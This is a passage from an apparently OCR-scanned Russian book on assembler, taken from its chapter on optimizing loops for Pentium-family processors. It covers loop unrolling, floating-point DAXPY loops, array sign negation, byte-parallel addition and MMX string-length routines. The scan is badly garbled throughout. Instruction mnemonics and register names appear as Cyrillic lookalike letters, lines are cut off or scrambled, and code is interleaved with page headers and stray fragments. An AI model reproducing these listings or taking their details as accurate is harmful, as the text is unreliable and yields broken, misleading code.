ми двумя инструкциями следующей итерации. Задержки АСТ удалось избежать ые 07 $08 ЕСХ, 2*0512Е $ изменяем погрешность указател 
чтению в первом такте после изменения индекса только тех параметров, котор 12 ЗНОВТ 13 ; закончили 
РЬБ 2512Е РТВ ГОА] ; начинаем новую операцию 
индекса не зависят. ЕМО 2512Е РТВ [Е51+ЕСХ+3*0512Е] 
Это решение занимает 6 тактов на операцию: . РМ МХ) ХСН 
6.25.1.11. Развертывание циклов с инструкциями с плавающей запятой (Ри 


ЕЗТР 25126 РТВ [ЕРТ+ЕСХ+2*0512Е] 
Цикл РАХРУ, развернутый в 3 раза, довольно сложен: 


1 
] 
3 
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р$17Е РТВ [ЕРТ+ЕСХ+3*0512Е] 





РООВЕВ 
АО ЕСХ, 1*10512Е 
95 ЗНОВТ 13 ; закончили 
РР 0$12Е РТК [РА] 
ЕМОЬ 05126 РТВ [Е51+ЕСХ+3*р512Е] 
ЕХСН 
ЕОТР 0512Е РТВ [ЕБТ+ЕСХ+2*Р5ТАЕ] 
ЕЗОВЕ 0512Е РТВ [ЕРТ+ЕСХ+3*р512Е] 
АР ЕСХ, 1*Р5Т2Е 
3: ЕОТР 05$172Е РТВ [ЕБ1+ЕСХ+2*0512Е] 


Ь4: 


Причина, по которой рассматривается вопрос, как развернуть цикл в три раза, не 
в том, чтобы порекомендовать подобный подход, а в том, чтобы продемонстрровать, как 
это сложно! Нужно быть готовым провести значительное количество времени, отлажи- 
вая и проверяя код со степенью развертывания меньше 4. Есть несколько проблем, о ко- 
торых нужно позаботиться: в большинстве случаев невозможно устранить все задержки 
в цикле с инструкциями плавающей запятой, если только не свернуть его (т.-е. в конце 
цикла будут операции, выполнение которых закончится в конце следующего повторе- 
ния). Последний ЕГО в основном цикле примера является началом первой операции 
в следующей итерации. Неплохо сделать реализацию, с методикой пунктов 6.25.13 
и 6.25.1.9, но это не рекомендуется делать с инструкциями плавающей запятой, потому 
что чтение дополнительного значения за границой массива может сгенерировать исклю- 
чение ненормализованного операнда, если после массива не находится число с плаваю- 
щей запятой. Чтобы избежать этого, приходиться делать по крайней мере на одну опера- 
цию больше после основного цикла. | 

Количество операций, которое необходимо выполнить снаружи развернутого цикла, 
как правило, будет равно М МОРОТЕ К, где М - количество операций, а В — коэффици- 
ент развернутости цикла. Но в случае со свернутым циклом, нужно сделать на одну опе- 
рацию больше, то есть (№-1) МОБОГО К + 1 в силу вышеуказанных причин. 

Обычно подготовительные операции выполняются до основного цикла, но здесь 
необходимо делать их позже в силу двух причин: одна причина - это забота об остав- 
шемся операнде (из-за свертывания). Другая причина состоит в том, что вычислений 
количества дополнительных операций требует деления, если К. не является степенью 2. 
а деление занимает много времени. Дополнительные операции после основного цикл? 
решают эту проблему. 

Другая задача — это высчитать, как влиять на счетчик цикла, чтобы он изменил знак В пра 
вильный момент, и привести в порядок базовые указатели. Наконец, следует убедиться, что 
оставшийся от свертывания операнд был обработан верно для всех значений ПМ. 

Эпилоговый код, делающий 1 — 3 операции, можно организовать как отдельный ЦИК 
но при этом появится неправильное предсказание, поэтому решение представленное вы 


ше быстрее. 
Теперь рассмотрим, насколько проще разворачивать цикл на 4 операции. 
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5126 


11; 


Ьё: 


ЬЗ: 


=8 


ЕСХ, ЕАХ 


ЗНОВТ 11 
2$12Е РТВ 
2$12Е РТВ 
О$12Е РТВ 
СХ 

2512Е РТВ 
АБ, 2 

Ь2 

0$12Е РТВ 
0$12Е РТВ 
2$12Е РТВ 
2$12Е РТВ 


0512Е РТВ 
2$12Е РТВ 


О$12Е РТВ 
0$12Е РТВ 
ЕСХ, 2 
ЕСХ, ЕСХ 
4 

0$12Е РТВ 
0$17Е РТВ 
$Т, $7 (1 } 
05125 РТВ 
57,57 (2) 
0512Е РТВ 
5Т, 571 {3} 
$7 (2) 
05125 РТВ 
$73) 
0$12Е РТВ 


2$12Е РТВ 
51(2)} 
2512Е РТВ 





{Е51+0512Е*ЕБАХ ] 


{601+0$12Е*ЕАХ ] 


; размер данных 

‚; количество элементов 
; указатель на Х 

; указатель на у 


‚; указывает на конец Х 

; -М 

‚; указывает на конец у 

‚ тестируем М на нечетност 


[0А] 
[Е5$1+0512Е*ЕСХ ] 
[801+0512Е*ЕСХ] 


‚ увеличиваем значение с 
[Е01+0512Е*ЕСХ-05$12Е] метчи 


; можно ли сделать еще 2 операции 


; делаем нечетную операцик 


[РА] 7 М МОР 4 = 2 или 3. Делаем еще д 


[651+0$12Е*ЕСХ ] 

[РА] 
[Е51+0512Е*ЕСХ+р$12Е] 
{601+0512Е*ЕСХ ] 
[Е01+0512Е*ЕСХ+р512Е] 


[Е21+0512Е*ЕСХ ] 
1Е01+0512Е*ЕСХ+О$Т2Е] 
; счетчик не делится 4 


; больше операций 
А раций нет 
16$1+0512Е*ЕСХ ] 
1Е51+0512Е*ЕСХ+0$12Е] 


[Е$1+0512Е*ЕСХ+2*0512Е] 


[601+0$12Е*ЕСХ] 
1Е51+0512Е*ЕСХ+3*0512Е] 
[Е01+0512Е*ЕСХ+$12Е] 


[Е01+2$12Е*ЕСХ+2*0512Е] 











_ Ро 
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ЕХСН 
РВВ  О512Е РТВ [Е01+0512Е*ЕСХ+3*0512Е] 
РХСН $7(3) 


РТР Р512Е РТВ [ЕР1+0512Е*ЕСХ] 
РТР О5Т2Е РТВ [ЕРТ+ОЗТАЕ*ЕСХ+2*05Т2Е] 


РТР 2512Е РТВ [ЕБ!т+0$12Е*ЕСХ+05Т2Е] 

РТР 2512Е РТВ [ЕБ1+0512Е*ЕСХ+3*0512Е] | 
АБВЬ ЕСХ, 4 ; увеличиваем значение индекса на (4 
9М2 3 ; цикл 


Ь4: 


Обычно довольно легко добиться отсутствия задержек в цикле, развернутом на 4, 
и нет нужды в свертывании последней операции. Количество дополнительных операций, 


` которые нужно сделать за пределами основного цикла равно М МОРЧГО 4, что можно 


легко посчитать без деления, просто протестировав два младших бита в М. Дополнитель- 
ные операции делаются до основного цикла, а не после, чтобы сделать обработку счет. 
чика цикла проще. 

Недостаток развертывания циклов в том, что дополнительные операции, выполняе- 
мые. за пределами цикла медленнее из-за несовершенного пересечения и возможных 
неправильных предсказаний переходов, а потери при первой загрузке кода выше из-за 
возросшего размера кода. 

В качестве основной рекомендации, можно принять то, что если М велико или если 
сворачивание цикла без развертывания не может удалить некоторых задержек, следует 
развернуть критические целочисленные циклы в два раза, а Жиклы с инструкциями пла- 
вающей запятой в 4 раза. 


6.25.2. Циклы в РРго, Р2 и РЗ 


В предыдущей части раздела (6.25.1) описывалось, как использовать свертывание 
и развертывание циклов, чтобы улучшить спаривание в Р1 иРММХ. На РРго, Р2 и РЗ вет 
никакой причины делать это благодаря механизму переупорядочевания инструкций. 
Но здесь есть другие проблемы, о которых надо заботиться, связанные с границами Б 
и задержкой чтения регистров. 

6.25.2.1. Рассмотрим те же примеры, что и в первой части раздела 6.25: процедур) 
которая считывает целые числа из массива, изменяет их знак, и сохраняет результа 

- в другой массив. 
На С эта процедура выглядела бы так: 


у0:4 Снапдез1ат (116 * А, 10 * В, 10 М) 
{ 

116 1; , 

Еог (1=0; 1<М№; 1++) В[1] = -А[1]; 


+ 
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Ее ассемблерный вариант: 


_Спапде519п РВКОС МЕАВ 


РОЗН Е51 
РОЗН ЕБТ 
А Е00 ВМОКЬ РТВ [Е5Р+12] 
В #00 ВИОВО РТВ [Е5Р+16] 
М ЕОЧ БИОВО РТВ [Е5Р+20] 
МОУ ЕСХ, [М] | 
ЧЕСХА Ь2 
МОУ ЕЗТ, [А) 
МОУ ЕБТ, [В) 
СТВ 
Ь1: .005В 
МЕС БАХ 
$1705 
ЬООР Ь1 
а: РОР вот 
РОР Е5Т 
ВЕТ 
_СВапде519п ЕМОР 


Это выглядит как довольно красивое решение, но, естественно, не самое оптималь 
ное, потому что он использует инструкции ГООР, ГОО$О и $ТОЗО, которые генериру 
ют много мопов. Одна итерация цикла занимает 6 - 7 тактов, если все данные находятс 
вкэше первого уровня. Если избегать данных инструкций, получим: 


* МОУ ЕСХ, [№] 
ЗЕСХА, Ь2 
МОУ ЕЗТ, [А} 
. МОУ ЕОТ, [В] 

АБТСМ 16 

Ь1: МОУ ВАХ, [Е5Т] ; 1еп=2, рагЕЗТмЕАХ 
АОВ ЕЗГ, 4 ; 1еп=3, рО1кмЕЗ1мЕ 
МЕС ВАХ ; 1еп=2, рО1емЕАХУЕ 
МОУ [Е21], ЕАХ ; 1еп=2, рАГЕАХ, р3ЗкЕБТ 
АБО ЕБТ, 4 ; 1еп=3, рО1тмЕР1мЕР 
ВЕС ЕСХ ; 1еп=1, рО1ЕмЕСХУЕ 
Ума 1 ; 1е1=2, р1:Е 


2: 


м Комментарии интерпретируются следующим образом: инструкция 'МОУ ЕАХ,[Е $1 
и, байта длиной, генерирует один моп для порта 2, который читает Е$1 и пишет (пере 
‘новывает) в ЕАХ. Эта информация требуется для анализа возможных узких мест. 
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ормац, 


Сначала проанализируем раскодировку инструкций (разд. 6.14): одна из инструк 
генерирует два мопа ("МОУ [ЕРЦ,ЕАХ.). Эта инструкция должна попасть в декодер 
Есть три раскодировываемые группы в цикле, поэтому его можно раскодировать за 3 так. 

Теперь посмотрим на доставку инструкций (разд. 6.15): если границы между БДИ ь 
дадут первым трем инструкциям раскодироваться вместе, тогда будет три раско дировы. 
ваемые группы в последнем БДИ, поэтому в следующем повторении БДИ начнется 
с первой инструкции, там где это нужно, и задержка возникнет только в первом Повторе. 
нии. Худшим вариантом будет 16-байтная граница и граница БДИ в одной из сле ДУЮщЩих 
трех инструкций. Это сгенерирует задержку в один такт и приведет к тому, что в сле. 
дующем повторении первый БДИ будет выровнен на 16 и проблема будет повторяться 
каждую итерацию. В результате время доставки будет равно 4 тактам на итерацию (а це 
3). Есть два пути предотвратить подобный вариант развития событий: первый метод 
заключается в том, чтобы контролировать расположение 16-байтных границ. Другой, 
проще: так как во всем цикле только 15 байт кода, можно избежать 16-байтных границ, 
выровняв цикл на 16, как показано выше. Тогда весь цикл будет умещаться в один БДИ, 
поэтому никакого дальнейшего анализа доставки инструкций не потребуется. 

Третья проблема - это задержки чтения регистров (разд. 6.16). В этом цикле не чита- 
ется ни один регистр, еслн, по крайней мере, несколько тактов назад в него не была про- 
изведена запись. 

Четвертая проблема — это выполнение инструкций (разд. 6.17). Подсчитывая мопы, 
предназначающиеся разным портам, имеем: порт 0 или 1: 4 мопа порт 1 : 1 моп порт?2: 1 
моп порт 3: 1 моп порт 4: 1 моп. Предположив, что мопы, которые могут пойти в порт0 
или 1, распределяются оптимальным образом, время выполнения будет равно 2.5 такта 
на итерацию. 

И последний анализ, который необходимо провести, — это вывод из обращения (разд. 
6.18). Так как количество мопов в цикле не кратно 3, слоты вывода из обращения не бу- 
дут использоваться оптимальным образом, когда переход будет выводиться из обраще 
ния через первый слот. Время, необходимое для вывода из обращения, равно количеству 
мопов, деленное на 3 и округленное в сторону ближайшего целого числа. Это дает 3 так 
та для вывода из обращения. 

В заключение, цикл, представленный выше, может выполняться за 3 так 
на итерацию, если код цикла выровнен на 16. Предполагается, что условный перехол 
предсказывается каждый раз, кроме выхода из цикла. . 

Использование одного и того же регистра для счетчика и индекса, и последнее значе 
ние счетчика равно нулю (РРго, Р2 и РЗ). 


МОУ ЕСХ, [№] 

МОУ Е51, [А] 

МОУ ЕР!, [В) , 
ТЕА ЕЗТ, [Е51+4*ЕСХ] ; указывает на конец массив@ 
ЪЕА ЕРТ, [Е01+4*ЕСХ] ; указывает на конец массив@ 


МЕС ЕСХ | ; -М 


ва 6. Оптимизация для процессоров семейства РепНит 44 
92 5НОВТ 12 
АЬ 176№ 16 
- МОУ ВАХ, [Е51+4*ЕСХ] . ; ]1еп=3, рагЕЗТЕЕСХМЕАХ 
= МЕС БАХ ; 1е0=2, р0О1ЕмЕАХиЕ 
МОУ [Е01+4*ЕСХ], ЕАХ ; 1еп=3, рАХЕАХ, р3ЗгЕОТЕЕСХ 
ТМС ЕСХ }; 1еп=], р0О1умЕСХиЕ 
9м2 Ь1 ; Теп=2, р1ЕЕ 
2: 


Количество мопов было снижено до 6. Базовые указатели указывают на конец масси 
вов, поэтому индекс можно увеличивать от отрицательных значений до нуля. 

6.25.2.1.1. Раскодировка. В этом цикле две раскодировываемые группы, поэтому рас 
кодировка пройдет в два такта. 

6.25.2.1.2. Доставка инструкций. Цикл всегда занимает, по крайней мере, на один так 
больше, чем количество 16-байтных блоков. Так как в нем только 11 байт кода, их мож 
но уместить в один БДИ. Выровняв цикл на 16, можно быть уверенным, что уместитс 
в один 16-байтный блок, поэтому возможно осущесвить доставку за 2 такта. 

6.25.2.1.3. Задержки чтения регистров. Регистры Е$З1 и ЕП! читаются, но не модифици 
руются внутри цикла. Поэтому эти считывания будут осуществляться из постоянных регр 
стров, но не в одном триплете. Регистры ВАХ, ЕСХ и флаги модифицируются внутри цикл 
и считываются до того, как они записываются обратно, поэтому чтения постоянных регу 
стров не будет, т. е. можно сделать заключение, что задержек чтения регистров нет. 

6.25.2.1.4. Выполнение. Порты 0 или 1: 2 моп порт 1: 1 моп порт 2: 1 моп порт 3: 
моп порт 4: | моп Время выполнения: 1.5 такта. 

6.25.2.1.5. Вывод из обращения. 6 мопов = 2 такта. 

Заключение: этот цикл занимает только два такта на итерацию. 

Если используются абсолютные адреса вместо ЕЗТ и ЕТ, тогда цикл будет занимал 
3 такта, потому что он не сможет уместиться в один 16-байтный блок. 

6.25.2.2. Развертывание цикла (РРго, Р2 и РЗ). Следующий пример развертывает ра‹ 


‘матриваемый цикл в два раза, что означает выполнение двух операций за раз, и мен: 
ее в два раза количество проходов. 


Пример 
МОУ ЕСХ, [М] 
МОУ Е5Т, [А] 
МОУ ЕБТ, [В] 
НВ ЕСХ, 1 $ №/2 
УМС ЗНОВТ 11 ; тестируем М на нечетность 
МОУ ВАХ, [Е5ТГ] ; Делаем нечетный раз 
АБВЬ ЕЗТ, 4 
МЕС ЕАХ 
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МОУ [ЕБТ], ЕАХ 
АБВ ЕО1, 4 

1: УЕСХЬ 3 

АГТСМ 16 

Ь2: МОУ ВАХ, [ЕЗТ] } 1еп1=2, рахЕЗ1чЕАХ 
МЕС ЕАХ ; 1еп=2, р01тмЕАХчЕ 
МОУ [ЕрТ], БАХ ; 1еп=2, рАтЕАХ, р3ЗхЕБТ 
МОУ ЕАХ, [Е51+4] ; 1еп=3, ра; Е$[мЕАХ 
МЕС БАХ ; 1еп=2, рО1ЕмЕАХмЕ 
МОУ [Е01+4], ЕАХ ; 1еп=3, рАГЕАХ, РЗЕЕБТ 
АБО ЕЗТ, 8 } 1еп=3, р01хмЕЗ1мР 
АРБ От, 8 } 1еп=3, р0О1кмЕБмЕ 
ВЕС ЕСХ ; 1еп=1, р01кмЕСХУЕ 
9М2 2 ; 1еп=2, р1:Е 





3: 


В этом примере пункта 6.25.2.1 инструкции управления циклом (т. е. изменение зна- 
чений указателей и счетчика, а также переход назад) занимал 4 мопа, а реальная работа 
занимала 4 мопа. 

При разворачивании цикла в два раза, анализируя доставку инструкций в этом цикле, 
видно, что новый БДИ начинается с инструкции 'АРО ЕЗ, 8', следовательно, она пойдет 
в декодер 00. Поэтому цикл раскодировывается за 5 тактов, а не за 4, как хотелось бы. 
Можно решить эту проблему, заменив предыдущую инструкцию'МОУ [ЕПБГ+-4],ЕАХ' на 


более длинную. 


МОУ [ЕБт+9999], ВАХ ; создаем инструкцию с большим смещением 
ОВС $-4 
БВ 4 ; изменяем смещение на 4 


Это заставит новый БДИ начаться с длинной инструкции 'МОУ [ЕПГ+4]', поэтому 
время раскодировки сейчас близко к 4 тактам. Оставшаяся свободная часть конвейера 
может обрабатывать 3 мопа за такт, поэтому. ожидаемое время выполнения равно 4 
тактам или 2 тактам на операцию. 

Тестирование этого решения показало, что в реальности оно занимает немного боль- 
ше ( 4.5 такта за итерацию). Вероятно, это связано с неоптимальной перегруппировкой 
мопов. Возможно, КОВ не смог найти оптимального порядка выполнения. Проблемы 
подобного рода непредсказуемы, и только тестирование может выявить их. Можно 
помочь КОВ сделать часть перегруппировки. 


АТОМ 16 
Ь2: МОУ ВАХ, [Е5Т} ; 1еп=2, р2хЕЗ1чЕАХ 
МОУ ЕВХ, [Е51+4] ; 1еп=3, р2гЕ$[мЕВХ 
МЕС ЕАХ ; 1еп=2, р01гмЕАХУЕ 
МОУ [501], ЕАХ ; 1еп=2, рАХЕАХ, р3ЗЕЕОТ 


АБ ЕТ, 8 ; 1еп=3, р0О1:мЕЗТмЕ 








МЕС ЕВХ ; 1еп=2, рОо1кмЕВХМЕ 


МОУ [Е01+4], ЕВХ ; 1еп=3, р4тЕВХ, Р3ЗГЕБТ 
АБВЬ ЕБТ, 8 ; 1еп=3, р0О1:мЕБТчЕ 

ВЕС ЕСХ ; 1еп=1, рО1кмЕСХУЕ 

9М7, 12 ; 1еп=2, р1хЕ 


ЬЗ;: 


Цикл теперь выполняется за 4 такта на итерацию. Также была решена проблема 
с БДИ. Это стоило дополнительного регистра, потому здесь не используются преимуще- 
ства переименования регистров. 

6.25.2.3. Развертывание более чем в 2 раза. Развертка циклов рекомендуется, когда 
инструкции по управлению циклами занимают значительную часть общего времени вы- 
полнения. В примере пункта 6.25.2.2 они занимают только 2 мопа, поэтому выгода будет 
невелика, но тем не менее рассмотрим, как его развернуть, просто ради упражнения. 

'Настоящая работа’ равна 4 мопам, на управление циклом уходит 2 мопа. Развернув 
его, получаем 2*4+3 = 10 мопов. Время вывода из обращения будет равно 10/3, отгругля- 


емв сторону ближайшет о целого, получается 4 такта. Эти вычисления показывают что 
› 
разворачивание ничего не дает. 


МОУ ЕСХ, [М] 
ЗНЬ ЕСХ, 2 ;. количество, которое нужно 
; обработать 
моу ЕЗТ, [А] 
МОУ ЕСТ, [В] 
АБЬ ЕЗТ, ЕСХ ; указываем на конец массива А 
АББ ЕО, ЕСХ ; указываем на конец массива В 
МЕС ЕСХ ; -4*М 
ТЕЗТ ЕСХ, 4 ; тестируем М на нечетность 
92 УНОВТ 11 
МОУ ЕАХ, [ЕЗТ+ЕСХ] ; № нечетно ел Й 
наи ВА Делаем нечетный раз 
МОУ [ЕБТ+ЕСХ], ЕАХ 
АБО ЕСХ, 4 
ь1: ТЕЗТ ЕСХ, 8 } Тестируем №/2 на нечетность 
92 ЭНОКТ 12 
МОУ ЕАХ, [Е5Т+ЕСХ} ; №/2 нечетно. Делаем два 
. ; дополнительны 
МЕС ВАХ г раза 
МОУ [Е21Т+ЕСХ], ЕАХ 
МОУ ЕАХ, [Е51+ЕСХ+4} 
МЕС ЕАХ 
МОУ [Е21+ЕСХ+4]}, ЕАХ 
АБО ЕСХ, 8 
12:  ЧЕСХР — 5НОВТ 14 
АТТСМ 16 
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3: МОУ ЕАХ, [Е51+ЕСХ] | ; 1еп=3, р2ахЕЗТЕЕСХиЕАХ 
МЕС ВАХ ; 1еп=2, р01:мЕАХМЕ 
ет [ЕБТ+ЕСХ], ВАХ ; 1еп=3, р4гЕАХ, Р3ЭЗЕЕОТЕЕСХ 
МОУ ЕАХ, [Е51+ЕСХ+4] ; 1еп=4, р2ахгЕЗТЕЕСХМЕАХ 
МЕС ВАХ ; 1еп=2, рО1тмЕАХМЕ 
МОУ [Е21+ЕСХ+4], ЕАХ ; 1еп=4, рАХЕАХ, РЗЕЕРТЕЕСх 
МОУ ЕАХ, [ЕЗТ+ЕСХ+8] ; 1еп=4, р2ахЕЗТЕЕСХМЕАХ 
МОУ ЕВХ, [Е51+ЕСХ+12] ; 1еп=4, рагЕЗТЕЕСХМЕАХ 
МЕС ВАХ ; 1еп=2, р0О1тмЕАХМЕ 
МОУ [Е21+ЕСХ+8], ЕАХ ; 1еп=4, р4тЕАХ, Р3ЗГЕРТЕЕСХ 
МЕС ЕВХ ; 1еп=2, рО1:мЕАХМЕ 
ет [ЕБТ+ЕСХ+12], ЕВХ ; 1еп=4, рАхЕАХ, Р3ЗЕЕОТЕЕСХ 
АБО ЕСХ, 16 ; 1еп=3, р01хмЕСХчЕ 
95 ь3 , ; ]1еп=2, р1тЕ 

4: 


БДИ распределяются так, как нужно. Время раскодировки равно 6 актам. 

Задержки чтения регистров являются здесь проблемой, так как Е . выводится ИЗ 
обращения в конце цикла, а нужно читать ЕЗТ, ЕП! и ЕСХ. Инструкции ыли перегрут 
пированы так, чтобы избежать чтения ЕЗ! в конце цикла во избежание задер ки Чтения 
регистра. Другими словами, причина перегруппировки инструкций и исп ия 
дополнительного регистра отличается от пункта 6.25.2.2. 

Здесь 12 мопов и цикл выполняется за 6 тактов на итерацию или 1.> такта 
ыы Можете рассмотреть возможность использования более чем двух операций за одно 
повторение, чтобы снизить количество действий, необходимых для организаци пк 
Но так как в большинстве случаев время, требуемое для выполнения таких де ‚ 
можно снизить только на один такт, то разворачивание цикла в четыре раза, а не в ыы . 
сохранит только 1/4 такта на операцию, что вряд ли стоит усилий, которые будут р . 
потрачены. Только в случае если М очень велико, стоит думать о разворачи 
в четыре раза. | 

Недостатки слишком болышого разворачивания цикла следующие: 


Ш необходимо посчитать № МОРОТО В, где В — это коэффициент разворачиван 
и сделать № МОРОГО В операций до или после основного цикла, чтобы вып ед 
недостающее количество операций. На это уйдет дополнительный код и плох о 
сказуемые операции условного перехода. И, конечно, тело цикла станет о и р 

Ш участок кода обычно выполняется в первый раз гораздо дольше, и чем ол 
тем больше будут связанные с этим потери, особенно если М невелико; 


№ значительное увеличение кода делает работу с кэшем менее эффективной. 
е 
дела 
Использование коэффициента развертывания, не являющегося степенью 2, 


Н 
тся, 67 

вычисление № МОРОГО К довольно трудным и, как правило, не рекоменлуе а 

только М не кратно В. Пример пункта 6.25.1.13 показывает, как разворачивать в р 


и 
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ВНИИ ООН а Вет Р ов В ВИО Бо ввоваонасевьае 
„и 
, 





6.25.2.3. Обработка нескольких 8-ми или 16-ти битных операндов одновременно в 
х битных регистрах (РРго, Р2 или РЗ). Иногда возможно обрабатывать четыре байт 


раз в ОДНОМ 32-битном регистре. Следующий пример добавляет 2 ко всем элеме 
массива байтов. 


Пример | 
МОУ ЕЗТ, [А] ; адрес массива байтов 
МОУ ЕСХ, [№] ; количество элементов в массиве байто 
ЧЕСХА Ь2 

АБ1СМ 16 


ОВ Т ОР (90Н) ; 71 №МОР'ов выравнивания 


1: МОУ ВАХ, [Е5Т] ; Читаем четыре байта 
МОУ ЕВХ, ЕАХ ; копируем в ЕВХ 
АМО ВАХ, ТЕТЕТЕТЕН ; получаем 7 нижних бит каждого бай 
Хок ЕВХ, ЕАХ ; получаем наивысший бит каждого байта 
АБВЬ ЕАХ, 02020202Н }; добавляем значение ко всем байтам 
ХОВ ЕВХ, ЕАХ ; снова комбинируем биты 
МОУ [Е51], ЕВХ ; сохраняем результат 
АО ЕСТ, 4 ; увеличиваем значение указателя 
ЗОВ ЕСХ, 4 ; понижаем значение счетчика 
ЧА 1 ; цикл 

2: 


Следует обратить внимание, что перед прибавлением 2 сохраняется старший | 
каждого байта, чтобы не испортить его значение 


ного байта превысит 256. 


Этот цикл в идеальном случае занимает 4 такта на итерацию, но в реальном — 
может занять немного больше из-за цепочки зависимости и трудностей с перегруппир 
кой. На Р2 и РЗ можно это делать еще более эффективно, используя регистры ММХ. 


Следующий пример находит длину строки, заканчивающейся нулем. Он гора: 
быстрее, чем ВЕРМЕ $САЗВ. 


(если результат сложения для конкр 


Пример 
_ЗЕг]1еп РВОС МЕАК 
РОЗН ЕВХ 
ет ЕАХ, [Е5Р+8] ; получаем указатель на строку 
ТЕА ВЫХ, [ЕАХ+3] ; указатель+3 используется в кон; 
1: МОУ ЕВХ, [ЕАХ] ; читаем первые 4 байта 
АОЬ ВАХ, 4 ; повышаем значение указателя 
ЪЕА ЕСХ, [ЕВХ-01010101Н} ; вычитаем 1 из каждого байта 
МОТ ЕВХ ; инвертируем все байты 
АМО ЕСХ, ЕВХ р и эти два 
АМО ЕСХ , 80808 080Н 


; тестируем все биты 














Ассемблер в задачах защиты информащи, 


Ь1 ; нет нулевых байтов, продолжаем цик- 
98 : 
МОУ ЕВХ, ЕСХ 
ЕВХ, 16 р 

ТЕ Е СХ, бОООЗОВОН ; тестируем первые два байта 
МО Е СХ, ЕВХ ; сдвигаем вправо, если не впервых 
вн | ; двух байтах 
ТЕА ЕВХ, [ЕАХ+2] 
р С ; используем флаг переноса, чтобы 
т" | ; избежать ветвления 
ВВ ЕАХ, ЕБХ | ; высчитываем длину 

! 
РОР ЕВХ 
КЕТ 


_з6г]еп ЕМОР 


у е 
й ОэтТо [®) О. а | сегмента. 
4 жет быть ДОВОЛЬНО СЛОЖНОЙ К 
Обработка байт за раз мо 
Т у ОЛЬК тогда, Когд. а: р ну . 
ко орая генерир т нену. е че 
) ОД лает возмож. УМ про 


но сравнивать 8 байт за одну операцию. 
3ёг]еп РКОС  МЕАВ 





РОЗН ЕВХ 
МОУ ЕАХ, [Е5Р+8) 
ЬЪЕА ЕБХ, [ЕАХ+7) 
РХОК ММО, ММО 
1: МОУ ММ1, [ЕАХ] ; тет к 
р) ЕАХ, 8 ; = | 
 ОМРЕСВ ММ1, ММО ; 1еп=3 НЫ 
МОУБ ЕВХ, ММ1 ; ]еп=3 р и 
РЗВЬО ММ1, 32 . ; 1еп=4 р1:ММ  УЕСХ 
МОУ ЕСХ, ММ1 ; 1еп=3 р01+:ММ1ч , 
ОВ ЕСХ, ЕВХ ; 1еп=2 р01тЕСХЕЕВХМ 
92 Ь1 ; 1еп=2 р1:Р 
МОУ ЕСХ,ММ1 
ТЕТ ЕВХ, ЕВХ 
СМОУ2 ЕВХ, ЕСХ 
ЪЕА ЕСХ, [ЕАХ+4} 
СМОУ2 ВАХ, ЕСХ 
МОУ ЕСХ, ЕВХ 
ЗНЕВ ЕСХ, 16 
ТЕЗТ ВХ, ВХ 
СМОУ2 ЕВХ, ЕСХ 


ТЕЛ ЕСХ, [ЕАХ+2 } 


г 


звони ватовое ини ини и ини зу опен в никон ен онваниничьнанаь 





СМОУ7, ЕАХ, ЕСХ 
УНК ВЬ, 1 
УВВ КАХ, ЕБХ 
ЕММ5 

РОР ЕВХ 

ВЕТ 


6.25.2.5. Циклы с инструкциями с плавающей запятой 
мизирования циклов с плавающей запятой п 


циклов, однако нужно остерегаться цепочек 
нения инструкций. 


Следующий код на языке С под названием РАХРУ: 


1161, п; 


(РРго, Р2 и РЗ). Методы опту 
римерно те же, что и для целочисленны 
зависимости из-за долгого времени выпол 


ЗоцЬ1е * Х; дошЬ1е * У; аочЬ1е ВА; 
Рок (1=0; 1<п; 1++) 51] = У[1] - БА * х[1]; 


его ассемблер выглядит следующим образом: 


2512Е = 8 ; размер данных (4 ог 8) 

МОУ ЕСХ, [М] ; количество элементов 

МОУ ЕТ, [Х] ; указатель на Х 

МОУ ЕБТ, [У) ; Указатель на У 

ЧЕСХА Ь2 ‚ проверяем, равняется ли М нулю 

РЬО 2512Е РТВ [РА] } загружаем ВА вне цикла 
АБТСМ 16 

ОВ 2 ВОР (90Н) ; 2 МОР'а для выравнивания 
Ь1; ЕГО 2512Е РТВ [Е51} ; 1еп=3 р2хЕ51и5т0 

АО Е5Т, 251Т2Е ; ]1еп=3 р01хЕЗТ 

ЕМИЬ $Т, 57 (1) ; 1еп=2 р0г5Т0г5Т1 

ЕЗОВВ 9512Е РТВ [201] 


; 1еп=3 р2ЕЕОТ, рОг5то 


РТР 2512Е РТВ [ЕШБЕ} ; 1еп=3 р4г5то, Р3ЗкЕБТ 


АБ ЕБТ, 25 12Е ; 1еп=3 рО1кЕБТ 

ВЕС ЕСХ ; 1еп=1 ро1кЕСХиЕ 

9М2 Ь1 ; 1еп=2 р1кР 

ЕОТР 5Т ; сбрасываем РА 
2: | 














450 Ассемблер в задачах защиты инфо 


Цепочка зависимости длиной в 10 тактов, но цикл занимает только 4 такта на итера 
потому что он может начать новую операцию еще до того, как выполнена предыдуц,, 
Цель выравнивания — предотвратить 16-байтную границу в последнем БДИ. 


О5ТиЕ = 8 ; размер данных (4 или 
МОУ ЕСХ, [М] ; количество элементов 4 
МОУ ЕЗТ, [Х) ; указатель на Х 





МОУ ЕОБТ, [У] ; указатель на У ор 
ЪЕА ЕЗТ, [Е51+0512Е*ЕСХ] ; указатель на конец массива 
ЪЕА ЕБТ, [ЕБТ+512Е*ЕСХ} ; указатель на конец массива 
МЕС ЕСХ | ; -№ 
95 ЗНОВТ 2 ‚} проверяем, равняется ли М нуг. 
РЬО 0512Е РТК [РА] ; загружаем ВА вне цикла 
АГТСМ 16 
1: РЬО О5ТЕ РТК [Е51+О512Е*ЕСХ] ; 1еп=3 р2кЕЗТкЕСХм5Т0 
ЕМОГ . 5Т,5Т(1) }; 1еп=2 р0г5Т0г5Т1 
Р5ОВВ О51АЕ РТВ [Е61+0512Е*ЕСХ] ; 1еп=3 рагЕБТЕЕСХ, р0у5то 
РТР О5ТАЕ РТВ [Е21Т+0512Е*ЕСХ} ; 1еп=3 р4т5Т0, р3ЗгЕБТЕЕСХ 
мс ЕСХ ; 1еп=1 р01ЕЕСХмЕ 
УМА Ь1 ; 1е1п=2 р1еЁ 
ЕОТР Т ; сбрасываем ВА 


2: 


Здесь мы используем тот же самый трюк, что и в примере 6.25.2.3. В идеальном слу- 
чае этот цикл будет занимать 3 такта, но измерения говорят примерно о 3.5 ввиду длин- 
ной цепочки зависимости. Разворачивание цикла сэкономит немного. 


6.25.2.6. Циклы с инструкциями ХММ (РЗ). Инструкции ХММ на РЗ позволяют опе- 
рировать четырьмя числами с плавающей запятой одинарной точности одновременно. 
Операнды должны быть выравнены на 16 байт. 

Алгоритм ОАХРУ не очень подходит для инструкций ХММ, потому что не так 
велика его точность, может не быть возможности выравнять операнды на границу 16 
байт, поэтому потребуется дополнительный код, если количество операций не краг 
